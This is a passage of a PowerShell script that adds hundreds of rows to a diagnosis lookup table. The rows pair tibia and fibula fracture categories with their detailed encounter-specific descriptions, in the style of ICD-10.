$DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right tibia","Other fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left tibia","Other fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified tibia","Other fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right tibia","Unspecified fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left tibia","Unspecified fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified tibia","Unspecified fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right tibia","Torus fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right tibia","Torus fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right tibia","Torus fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right tibia","Torus fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right tibia","Torus fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right tibia","Torus fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left tibia","Torus fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left tibia","Torus fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left tibia","Torus fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left tibia","Torus fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left tibia","Torus fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left tibia","Torus fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified tibia","Torus fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified tibia","Torus fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified tibia","Torus fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified tibia","Torus fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified tibia","Torus fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified tibia","Torus fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right tibia","Other fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left tibia","Other fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified tibia","Other fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right fibula","Unspecified fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = 